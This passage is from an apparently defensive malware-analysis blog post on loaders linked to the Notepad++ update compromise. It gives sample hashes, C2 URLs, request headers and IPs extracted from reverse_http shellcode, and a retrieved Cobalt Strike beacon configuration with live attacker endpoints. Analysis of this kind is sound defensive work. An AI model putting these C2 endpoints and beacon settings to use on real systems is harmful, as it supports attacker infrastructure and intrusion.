| TLSH | 3B82D63BE31348FCC916D6B496FB2732BCB239A345A1573E1360D2F51F216A06D6EA11 |
| KSS Upload | 2025-05-21 04:20:30+00:00 |
| VT Upload | 2025-05-26 11:13:40+00:00 |
| KTIP Upload | 2025-05-20 11:50:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | cbb8a3208e5fb83610ac75b671cd629c6e3481fc |
| SHA256 | e5aea542ee91767b72924b3379cf0af3da6a8168686eab1621350b96bfadb0de |
| TLSH | 5C82D73BE31348FDC516D6B495FB6A327CB23DA305A1573D2370D2F51E216A02DAEA10 |
| KSS Upload | 2024-05-21 01:33:46+00:00 |
| VT Upload | 2024-05-21 08:23:44+00:00 |
| KTIP Upload | 2024-05-20 09:18:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | 03bceec136964f101f5f98ce07da9e1a566865e3 |
| SHA256 | e65e6051980701ae9bcd600fd08c7be44f8f299c8ad68d8cbddf704f9757c870 |
| TLSH | 3982D61BA31348FCC916D6B485FB6B32B8B23D5146A1473E337CD6F51F216A02D9EA11 |
| KSS Upload | 2022-07-19 18:47:57+00:00 |
| VT Upload | 2022-07-16 13:22:44+00:00 |
| KTIP Upload | 2022-07-16 11:34:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | 48681fea3928cab8b5d3c3cf997942a83b52ffb9 |
| SHA256 | eac8bc6c7c2f64026090b3168ce6637f6b20ede1c40fbbc9c41a38542ec3e888 |
| TLSH | 0782F81BE31348FDC516D6B499FB673278B2399146A0473D3378E1F51F21AB02EAEA11 |
| KSS Upload | 2024-04-09 18:10:28+00:00 |
| VT Upload | 2024-04-06 08:57:08+00:00 |
| KTIP Upload | 2024-04-06 07:12:00+00:00 |
| Size | 18944 |
| Attribute | Value |
|---|---|
| SHA1 | 922f68545356193ee2aeb39331d4e280dc0a9856 |
| SHA256 | fda438bb67c8486045b3fb43fe125a2fb18c939e9630b6d5f007a0278a07619b |
| TLSH | 3182D63BE21358FCC916D6B495FB27327CB23DA306A1573D1370D2F51E216A02EAEA15 |
| KSS Upload | 2024-09-09 02:34:54+00:00 |
| VT Upload | 2024-09-10 06:37:28+00:00 |
| KTIP Upload | 2024-09-08 09:25:00+00:00 |
| Size | 18944 |
The samples all have the same size as loader 2 from the Rapid7 blog. The similarity can also be observed in their Hilbert-curve image representations.
Manual analysis of the related samples confirms the similarity. For example, e7cd60... (loader 2) and 055f7f... differ only in the CheckSum field of the ImageOptionalHeader and in the G_SHELLCODE_LEN, G_XOR_KEY and G_ENCRYPTED_SHELLCODE global variables. As the original loader is thought to be a custom implementation (not a generic, freely available one like Metasploit payloads or Cobalt Strike), these similar samples can point us to previous targets of the same attacker.
The payloads are similar msfvenom windows/x64/custom/reverse_http shellcodes using Wininet functions to load the next stage, so we can extract the LHOST, LPORT, LURI and HTTP headers just like before. Their original source code is available on GitHub in metasploit-framework as reverse_http_x64.rb. From the shellcodes, we extracted the following configurations:
| URL | Sample first seen | Headers |
|---|---|---|
| https://43.136.93.209:8443/center/user_sid | 2024-08-25 02:55:53+00:00 (VT) | Accept: */*<br>Accept-Language: en-US,en;q=0.5<br>Connection: close<br>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| http://154.8.140.211:8011/VS66V3Ez | 2024-11-22 09:34:05+00:00 (VT) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| https://124.221.160.203:8876/r/www/cache/static/protocol/https/global/js/all_async_search_ef1056e.js | 2022-03-13 23:51:00+00:00 (KTIP) | Accept: */*<br>Referer: https://www.baidu.com/<br>Content-Type: text/javascript<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36 |
| http://81.70.37.146:80/4l5C3VMo | 2025-09-11 16:14:00+00:00 (KTIP) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| https://62.234.11.61:443/76kAq89b | 2025-04-16 04:32:29+00:00 (KSS) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| https://154.8.140.211:4436/ndn97D81 | 2024-01-09 23:38:00+00:00 (KTIP) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| https://62.234.11.61:443/K42qGRQQ | 2025-05-20 11:50:00+00:00 (KTIP) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| http://43.138.234.160:8088/center/user_sid | 2024-05-20 09:18:00+00:00 (KTIP) | Accept: */*<br>Accept-Language: en-US,en;q=0.5<br>Connection: close<br>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
| http://185.102.170.167:2002/vFSN | 2022-07-16 11:34:00+00:00 (KTIP) | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) |
| https://10.211.55.5:443/Kql5 | 2024-04-06 07:12:00+00:00 (KTIP) | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 2.0.50727) |
| http://62.234.11.61:443/WKmBPBG3 | 2024-09-08 09:25:00+00:00 (KTIP) | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36 |
Extracted IP addresses categorized by AS:
| IP | AS |
|---|---|
| 43.136.93.209, 154.8.140.211, 124.221.160.203, 81.70.37.146, 62.234.11.61, 43.138.234.160 | AS 45090 (Shenzhen Tencent Computer Systems Company Limited) 🇨🇳 |
| 185.102.170.167 | AS 12844 (Bouygues Telecom SA) 🇫🇷 |
| 10.211.55.5 | private |
So if the code used for loader 2 is truly unique to this threat group (believed to be Lotus Blossom), we now know that they've been using this stager with different shellcode configurations since at least 2022-03, with the above IP addresses.
We queried all URLs with the extracted request parameters, and hxxp[://]81.70.37.146:80/4l5C3VMo was live (at 2026-02-12 10:34:58+01:00) and returned the following file:
Sample downloaded from 81.70.37.146
| Attribute | Value |
|---|---|
| SHA1 | e52f65761ffc5b80a439aa3b9ebc47bf300e1650 |
| SHA256 | 006f0ba963a63d9b2822b139ac806dee71eb6a3382b1b1db74b5cf2e60b57a51 |
| TLSH | T1FC83D01B96F1E5074F4D53B43AA2FEEC927352B25C88F8BBB4816451DEF190470A9ACC |
| KSS Upload | - |
| VT Upload | - |
| KTIP Upload | - |
| Size | 88139 |
| Source | Ukatemi |
| Description | Stage 2 of 7811fb...3d6ceb downloader from hxxp[://]81.70.37.146:80/4l5C3VMo matching conf.c |
After analysis, we found that this file is very similar to the one detailed in the Analysis of conf.c section of the Rapid7 report. At the beginning, it performs the same rolling XOR-based decryption:

Decrypted stage
| Attribute | Value |
|---|---|
| SHA1 | 05637ac376c2672d5dc9aa86efcc1fb13d7d00e8 |
| SHA256 | be334153e1bfc5ba156ab6a2e6e939990f2cc2ceef553b127d423ab7c4e5d9b1 |
| TLSH | T1EB836C12E72438F6EB53A430458AE956BEDF62E38A7C1B0211A554D9FC1FB988DCCD03 |
| KSS Upload | - |
| VT Upload | - |
| KTIP Upload | - |
| Size | 88068 |
The decrypted stage contains a similar section encrypted with the CRAZY XOR key. It is a Cobalt Strike (CS) HTTPS beacon with the following configuration:
```text
http-get: 81.70.37.146/api/getBasicInfo/v1
http-post: 81.70.37.146/api/Metadata/submit
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36
```
loader 3 #
There are 3234 samples similar to loader 3 in our database; 1120 of these are newer than 2025-01-01. As the original loader 3 was uploaded to VirusTotal on 2025-03-27, we only processed these newer samples. None of them contained the string clipc.dll. 20 of them use the function NtQuerySystemInformation; we checked these manually, but none of them contained code similar to the snippet highlighted in the Rapid7 report.

Future work #
As mentioned in the Rapid7 analysis, the Chrysalis backdoor doesn't seem like a throwaway tool. It would be worth replicating the attack sequence in a virtual environment and debugging log.dll until the BluetoothService shellcode is loaded, decrypted and jumped to, and the main Chrysalis module is decrypted. At that stage, the decrypted module could be dumped from memory. A similarity search might produce additional variants from Kaibou, who knows. Hit me up if you are interested: csongor.tamas@ukatemi.com
The NSIS installer containing everything can be downloaded from MalwareBazaar.
If you are interested in getting access to Kaibou Search Services and the 800+ million files within, reach out at kss@ukatemi.com.
IoCs #
hostinger-files.csv
hostinger-ips.txt
kaspersky-files.csv
kaspersky-urls.txt
rapid7-files.csv
rapid7-urls.txt
ukatemi-files.csv
ukatemi-urls.txt
Links #
2025-10-23: Notepad++ forum post about suspicious update activity
2025-11-30: wingup commit to add signature verification
2025-12-01: Notepad++ commit to add signature verification
2025-12-09: Notepad++ announcement about vulnerability fix
2025-12-09: Notepad++ v8.8.9 update includes vulnerability fix
2026-02-02: Notepad++ post announcing the incident
2026-02-05: IoCs from Hostinger
2026-02-02: Rapid7 blog about malicious toolkit used during the attack
2026-02-03: Kaspersky reports what they uncovered from their telemetry
2026-02-03: Validin about the C2 infrastructure
2026-02-03: Hostinger report about the incident
2026-02-04: Blog by Costin Raiu